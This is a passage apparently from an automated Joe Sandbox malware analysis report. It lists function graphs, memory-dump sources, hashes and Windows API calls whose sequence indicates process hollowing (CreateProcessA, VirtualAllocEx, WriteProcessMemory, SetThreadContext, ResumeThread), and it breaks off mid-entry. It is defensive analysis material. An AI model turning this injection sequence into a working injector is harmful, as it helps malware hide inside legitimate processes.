                                                                                                    control_flow_graph 0 24f400-24f499 2 24f4e2-24f50a 0->2 3 24f49b-24f4b2 0->3 7 24f550-24f5a6 2->7 8 24f50c-24f520 2->8 3->2 6 24f4b4-24f4b9 3->6 9 24f4dc-24f4df 6->9 10 24f4bb-24f4c5 6->10 17 24f5ec-24f6e3 CreateProcessA 7->17 18 24f5a8-24f5bc 7->18 8->7 15 24f522-24f527 8->15 9->2 11 24f4c7 10->11 12 24f4c9-24f4d8 10->12 11->12 12->12 16 24f4da 12->16 19 24f529-24f533 15->19 20 24f54a-24f54d 15->20 16->9 36 24f6e5-24f6eb 17->36 37 24f6ec-24f7d1 17->37 18->17 26 24f5be-24f5c3 18->26 21 24f535 19->21 22 24f537-24f546 19->22 20->7 21->22 22->22 25 24f548 22->25 25->20 28 24f5c5-24f5cf 26->28 29 24f5e6-24f5e9 26->29 30 24f5d1 28->30 31 24f5d3-24f5e2 28->31 29->17 30->31 31->31 32 24f5e4 31->32 32->29 36->37 49 24f7e1-24f7e5 37->49 50 24f7d3-24f7d7 37->50 52 24f7f5-24f7f9 49->52 53 24f7e7-24f7eb 49->53 50->49 51 24f7d9 50->51 51->49 55 24f809-24f80d 52->55 56 24f7fb-24f7ff 52->56 53->52 54 24f7ed 53->54 54->52 57 24f843-24f84e 55->57 58 24f80f-24f838 55->58 56->55 59 24f801 56->59 63 24f84f 57->63 58->57 59->55 63->63
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0024F6C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID: l~ S$l~ S
                                                                                                    • API String ID: 963392458-3692758704
                                                                                                    • Opcode ID: c8a9e2f64a1362b3d89f3a8acc5c442af2987b65659cd14a924bbfd7ab0df473
                                                                                                    • Instruction ID: bd7fe097bd4490cf1cb5d8be6710dd0f7f5aea6b389fa1aac383fa65aabd8e88
                                                                                                    • Opcode Fuzzy Hash: c8a9e2f64a1362b3d89f3a8acc5c442af2987b65659cd14a924bbfd7ab0df473
                                                                                                    • Instruction Fuzzy Hash: C7C15770D002198FDF64CFA4C945BEEBBB1BF89300F1091AAD419B7240EB749A95CF91
                                                                                                    Function 0024EF38 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 64 24ef38-24f000 VirtualAllocEx 68 24f002-24f008 64->68 69 24f009-24f053 64->69 68->69
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0024EFEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: Ph$l~ S
                                                                                                    • API String ID: 4275171209-640031543
                                                                                                    • Opcode ID: e0ea6bc7103530ba01b08b2fd7044974e104049ec7bcb468012088e081f1ce7f
                                                                                                    • Instruction ID: 05500b250556271704282149baebc0e31e0b26ffb2e4b98f3964bc8726802ae9
                                                                                                    • Opcode Fuzzy Hash: e0ea6bc7103530ba01b08b2fd7044974e104049ec7bcb468012088e081f1ce7f
                                                                                                    • Instruction Fuzzy Hash: 7B41ACB4D002589FCF14CFA9D984AAEFBB1BF49310F20901AE814B7210D735A916CF65
                                                                                                    Function 0024F061 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 173 24f061-24f0d3 175 24f0d5-24f0e7 173->175 176 24f0ea-24f151 WriteProcessMemory 173->176 175->176 178 24f153-24f159 176->178 179 24f15a-24f1ac 176->179 178->179
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F13B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 3559483778-1765668369
                                                                                                    • Opcode ID: be5e0aef59467d6a9f9dbaa87c4389f08c25a84b8e47b6fdedf3cdabd07979d9
                                                                                                    • Instruction ID: d1c6252630db0b143794184d2f830e2aa8d45a89e3187fa5e080e942c39f1bce
                                                                                                    • Opcode Fuzzy Hash: be5e0aef59467d6a9f9dbaa87c4389f08c25a84b8e47b6fdedf3cdabd07979d9
                                                                                                    • Instruction Fuzzy Hash: 1F41BDB4D012489FDF04CFA9D984AEEFBB1BF49310F20942AE818B7250D375AA55CF64
                                                                                                    Function 0024F068 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 184 24f068-24f0d3 186 24f0d5-24f0e7 184->186 187 24f0ea-24f151 WriteProcessMemory 184->187 186->187 189 24f153-24f159 187->189 190 24f15a-24f1ac 187->190 189->190
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F13B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 3559483778-1765668369
                                                                                                    • Opcode ID: 7846d0d488ab269669a91010ef3556d07631ede7bf4cb83b197a4fe9e50b6e54
                                                                                                    • Instruction ID: 68bed942b948beb60b4741eea3ec54c3458ad11d58094c2cbdc7d10f50d7573d
                                                                                                    • Opcode Fuzzy Hash: 7846d0d488ab269669a91010ef3556d07631ede7bf4cb83b197a4fe9e50b6e54
                                                                                                    • Instruction Fuzzy Hash: 7841ABB4D012589FDF04CFA9D984AEEFBB1BF49310F20902AE818B7250D375AA55CF64
                                                                                                    Function 0024F1C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 195 24f1c0-24f290 ReadProcessMemory 198 24f292-24f298 195->198 199 24f299-24f2eb 195->199 198->199
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F27A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 1726664587-1765668369
                                                                                                    • Opcode ID: b0b631e2510bc66c43a713b4879a7d01d47fd95012fe2ce9b404ce1a1d2d4fcc
                                                                                                    • Instruction ID: 28af9f571a3b428592918f096fb9b3f09de7d1426db4fa3e4ba4c74cf1376c84
                                                                                                    • Opcode Fuzzy Hash: b0b631e2510bc66c43a713b4879a7d01d47fd95012fe2ce9b404ce1a1d2d4fcc
                                                                                                    • Instruction Fuzzy Hash: 0B41ABB9D002589FCF14CFA9D984AEEFBB1BF49310F20942AE814B7250D375A956CF64
                                                                                                    Function 0024F1C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 204 24f1c8-24f290 ReadProcessMemory 207 24f292-24f298 204->207 208 24f299-24f2eb 204->208 207->208
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F27A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 1726664587-1765668369
                                                                                                    • Opcode ID: dfab5e4839e6be48d708622e142b8e0718b97de7f61e28f5111e01478769b2a7
                                                                                                    • Instruction ID: ecde4d81b45f622f5c0cdadc5f7c69f56df90ea60bea00083120cb1fadb66655
                                                                                                    • Opcode Fuzzy Hash: dfab5e4839e6be48d708622e142b8e0718b97de7f61e28f5111e01478769b2a7
                                                                                                    • Instruction Fuzzy Hash: DD41BBB9D002589FCF04CFA9D984AEEFBB1BF49310F20902AE814B7210D775AA55CF64
                                                                                                    Function 0024EF40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 213 24ef40-24f000 VirtualAllocEx 216 24f002-24f008 213->216 217 24f009-24f053 213->217 216->217
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0024EFEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 4275171209-1765668369
                                                                                                    • Opcode ID: de4906b1a42ac9ab27656379dd6dac9b6f87daf2302a68df5d21be722a55e152
                                                                                                    • Instruction ID: 540dd94e38383331065228086fc349068c02beb72cc4b1edb442ee8a7b16f71f
                                                                                                    • Opcode Fuzzy Hash: de4906b1a42ac9ab27656379dd6dac9b6f87daf2302a68df5d21be722a55e152
                                                                                                    • Instruction Fuzzy Hash: B0419AB4D002589FCF14CFA9D984AAEFBB1BF89310F20942AE814B7210D735A956CF65
                                                                                                    Function 0024E598 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 222 24e598-24e600 224 24e617-24e665 Wow64SetThreadContext 222->224 225 24e602-24e614 222->225 227 24e667-24e66d 224->227 228 24e66e-24e6ba 224->228 225->224 227->228
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0024E64F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 983334009-1765668369
                                                                                                    • Opcode ID: 5f4bb31d36f8ed074b0fad977f6d9e503038dc9ec3217702928af3d1d80d7572
                                                                                                    • Instruction ID: c97274a2926e11df170a9b9b76b0ca0bdd0f774f18b2a548489fce4355d7ae53
                                                                                                    • Opcode Fuzzy Hash: 5f4bb31d36f8ed074b0fad977f6d9e503038dc9ec3217702928af3d1d80d7572
                                                                                                    • Instruction Fuzzy Hash: D841E0B4D102589FDF14CFA9D884AEEFBB1BF48314F24802AE418B7240D739AA45CF54
                                                                                                    Function 0024E5A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 233 24e5a0-24e600 235 24e617-24e665 Wow64SetThreadContext 233->235 236 24e602-24e614 233->236 238 24e667-24e66d 235->238 239 24e66e-24e6ba 235->239 236->235 238->239
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0024E64F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 983334009-1765668369
                                                                                                    • Opcode ID: 9b4d1961c8b10f675cba1f3a84f5cc6b075dfdd9f7f562396485896c6d396094
                                                                                                    • Instruction ID: 47c283d9bb94291b7b5c44b7a301318ee94d6497b8b5c57507981f3c5a10d787
                                                                                                    • Opcode Fuzzy Hash: 9b4d1961c8b10f675cba1f3a84f5cc6b075dfdd9f7f562396485896c6d396094
                                                                                                    • Instruction Fuzzy Hash: 7241CDB4D102589FDF14CFA9D884AEEFBB5BF89314F24802AE418B7240D739AA45CF54
                                                                                                    Function 0024E4A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 244 24e4a8-24e544 ResumeThread 247 24e546-24e54c 244->247 248 24e54d-24e58f 244->248 247->248
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 947044025-1765668369
                                                                                                    • Opcode ID: 0a0059788b3ae001805a4822a88e116eb281276e0a7499aae58ee7a61d6d3098
                                                                                                    • Instruction ID: d0fc2532a4ae49d53a8fd4bd60fbe41ebc0f3bfa337e3f25e48315bee590786b
                                                                                                    • Opcode Fuzzy Hash: 0a0059788b3ae001805a4822a88e116eb281276e0a7499aae58ee7a61d6d3098
                                                                                                    • Instruction Fuzzy Hash: 7C31CCB4D102189FDF14CFA9D884AAEFBB1BF89314F24841AE815B7210D775A906CF94
                                                                                                    Function 0024E4B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 253 24e4b0-24e544 ResumeThread 256 24e546-24e54c 253->256 257 24e54d-24e58f 253->257 256->257
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 947044025-1765668369
                                                                                                    • Opcode ID: 12bc783c732515d2411123dabd8e3a29bb171044c812be846b7cea3b7349101d
                                                                                                    • Instruction ID: 026ea83bb99f52ec68ebd0f56f5d854cbd6ddf1a872c8cee05cf3e85198b10af
                                                                                                    • Opcode Fuzzy Hash: 12bc783c732515d2411123dabd8e3a29bb171044c812be846b7cea3b7349101d
                                                                                                    • Instruction Fuzzy Hash: DC31DCB4D102189FDF14CFA9D884AAEFBB1BF88314F20841AE814B7310D735A906CF94
                                                                                                    Function 00A511DE Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 317 a511de-a511df 318 a511e1-a511fd 317->318 319 a5116c-a51190 317->319 320 a51204-a51230 318->320 321 a511ff 318->321 322 a51197-a511b6 319->322 323 a51192 319->323 325 a513d4-a513ef 320->325 321->320 372 a511b9 call a515a4 322->372 373 a511b9 call a51647 322->373 374 a511b9 call a51a66 322->374 375 a511b9 call a51921 322->375 376 a511b9 call a518f0 322->376 377 a511b9 call a515c0 322->377 378 a511b9 call a519b3 322->378 379 a511b9 call a51ab9 322->379 380 a511b9 call a5188a 322->380 381 a511b9 call a517ea 322->381 323->322 336 a51375-a5137e 325->336 337 a51394 325->337 328 a511bf-a511c0 339 a51385-a51388 336->339 340 a51380-a51383 336->340 338 a51397-a5139b 337->338 344 a51235-a5123a 338->344 345 a512e0-a512e6 338->345 342 a51392 339->342 340->342 342->338 346 a51240-a51241 344->346 347 a5130c-a51310 344->347 345->344 346->347 348 a51316-a51324 347->348 349 a51312-a51315 347->349 351 a5142e-a51432 348->351 349->348 352 a512fc-a5130a 351->352 353 a51438-a51439 351->353 357 a512f5-a512f6 352->357 358 a51260-a5126e 352->358 356 a513fa-a51428 353->356 356->351 357->358 362 a51253-a513f4 358->362 363 a5124c-a513ce 358->363 362->356 363->325 372->328 373->328 374->328 375->328 376->328 377->328 378->328 379->328 380->328 381->328
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: G4MJ
                                                                                                    • API String ID: 0-3610995474
                                                                                                    • Opcode ID: d285e03f1320233e1e4f88b76d2900a61a5456cbf4aaa18bc3c6b9127714d5bb
                                                                                                    • Instruction ID: 98362c666afbcce3eb01145db2c9fbd0e175c8f7baed193c12cecf0df16c081d
                                                                                                    • Opcode Fuzzy Hash: d285e03f1320233e1e4f88b76d2900a61a5456cbf4aaa18bc3c6b9127714d5bb
                                                                                                    • Instruction Fuzzy Hash: 1D812174E09208CFDB14CFA5D9547FDBBB6BB8A302F20912AD809BB291D7745A49CF40
                                                                                                    Function 00A528C8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M
                                                                                                    • API String ID: 0-3664761504
                                                                                                    • Opcode ID: 88766649eda98c7bf11fad3ee5a486737984afd219661824482607ce480db406
                                                                                                    • Instruction ID: 1e65b55c543b4a83bde63a89fd482bcce401e52de42cbaf81f2f993b0427f48d
                                                                                                    • Opcode Fuzzy Hash: 88766649eda98c7bf11fad3ee5a486737984afd219661824482607ce480db406
                                                                                                    • Instruction Fuzzy Hash: 9BE0C230805208DBCB04EBF4D98436C77B8BB06301F100094C80593280DB300E98DB41
                                                                                                    Function 00A50D9F Relevance: .1, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c3a69288c0a38e238c086803501c819d8ade2e1ab3f8750fcfb4e735bd45c3f0
                                                                                                    • Instruction ID: 121f3c3a6169a39bf0f6605c64b85fd49ea396aecfe555605f8e117b19a8c949
                                                                                                    • Opcode Fuzzy Hash: c3a69288c0a38e238c086803501c819d8ade2e1ab3f8750fcfb4e735bd45c3f0
                                                                                                    • Instruction Fuzzy Hash: 715107B5A05219CFCB00CFA9D5849EEFBF2FF49301F24A555E819A7342C774A985CB60
                                                                                                    Function 00A505FD Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8278ad5a46c51c5126960b403702d4cefc17cb35d2ef8936352865445b3795e2
                                                                                                    • Instruction ID: 56ec0bd9414b367f7ea450081c495e7c82217515dbf3735c23ab7dbee82712ed
                                                                                                    • Opcode Fuzzy Hash: 8278ad5a46c51c5126960b403702d4cefc17cb35d2ef8936352865445b3795e2
                                                                                                    • Instruction Fuzzy Hash: BE51BC74E102088FDB04DFE4D954AAEBBB6FF89301F20912AE80ABB355DB705952CF51
                                                                                                    Function 00A50E19 Relevance: .1, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 161db972099dea46d1525498ad8c58f51d99694da15d81ab283bd5579a7443b1
                                                                                                    • Instruction ID: 2883be1de42877678ec243686d31cbbb23871e314ecf95deed0e97d7e334d8ff
                                                                                                    • Opcode Fuzzy Hash: 161db972099dea46d1525498ad8c58f51d99694da15d81ab283bd5579a7443b1
                                                                                                    • Instruction Fuzzy Hash: 2341E5B9A05229CFCB00CFA9D5809EEFBF2BF49305F249555E819A7242C774AD85CB60
                                                                                                    Function 00A50569 Relevance: .1, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6579c4189f073aba0ede5b2bc962e9068472dbfc4bb22679f0c2dbe7650020d1
                                                                                                    • Instruction ID: 2746b52960a8612bfde48cd23e3e339aeda56d5c4272bd8aa68c01891e2e426b
                                                                                                    • Opcode Fuzzy Hash: 6579c4189f073aba0ede5b2bc962e9068472dbfc4bb22679f0c2dbe7650020d1
                                                                                                    • Instruction Fuzzy Hash: B341B174E152088FEB08DFA5D854AADBBB7FF89300F20912AE819BB365DB705951CF50
                                                                                                    Function 00A50596 Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3391a641e5568eb0de90d0fe1f86e3fa5b0252dc6e7f9f5fbffc311e9061c1f3
                                                                                                    • Instruction ID: e446d77f9a4fafe783c73180244b6fac279804cd095553e7d08a728e1037f247
                                                                                                    • Opcode Fuzzy Hash: 3391a641e5568eb0de90d0fe1f86e3fa5b0252dc6e7f9f5fbffc311e9061c1f3
                                                                                                    • Instruction Fuzzy Hash: 8B419C74E102088FEB04DFE4D854AAEBBB6FF89301F20812AE81ABB755DB745951CF51
                                                                                                    Function 00A515C0 Relevance: .1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5aeb53f06dd7221adb8e17245b3d3048e82e23d82f6bb6b465e730bbceba525f
                                                                                                    • Instruction ID: 264c23f0c93b257dc1a8bd4fb63a5506e3cc210887f190fa1264c852fc59b5e4
                                                                                                    • Opcode Fuzzy Hash: 5aeb53f06dd7221adb8e17245b3d3048e82e23d82f6bb6b465e730bbceba525f
                                                                                                    • Instruction Fuzzy Hash: 8B416971D4521ACBDB20CF64CC80BE8B7B5BF8A301F2496E6D909A7240EB705AC9DF40
                                                                                                    Function 0015D478 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409521619.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_15d000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad9bae6908250a38dc1249fb104f3a5d44bd18384d44eefaecf5ebc546edee7e
                                                                                                    • Instruction ID: 864b0b435a4aa7f1f983c7c15defb4f4f1df9772c9974187307f7e34de56f84d
                                                                                                    • Opcode Fuzzy Hash: ad9bae6908250a38dc1249fb104f3a5d44bd18384d44eefaecf5ebc546edee7e
                                                                                                    • Instruction Fuzzy Hash: 1F210371204240DFDB25CF10E8C4B26BFB5EB98319F24C169EC094F246D336D95ADBA2
                                                                                                    Function 00A50160 Relevance: .1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5210521ab449ad0023d802e2c49caa1323e6fc619ceac0f79425347726ee40fc
                                                                                                    • Instruction ID: 1681b747744cfa1924b9a39f73829423ffc1dc54148c398475d8c77409f9c8ba
                                                                                                    • Opcode Fuzzy Hash: 5210521ab449ad0023d802e2c49caa1323e6fc619ceac0f79425347726ee40fc
                                                                                                    • Instruction Fuzzy Hash: D911E7B4D04209DFCB04DFA4D959AAEBBB2FF8A302F206569D809F7251E7704A45CF51
                                                                                                    Function 0015D473 Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409521619.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_15d000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b48776ead326f36cfa7bbce34c2dd7610da6e5945deb13a2d49889f946375c05
                                                                                                    • Instruction ID: 40a4a88444b7beca788a6bb189e21514950910e5793302d32c7a43a9cc327c99
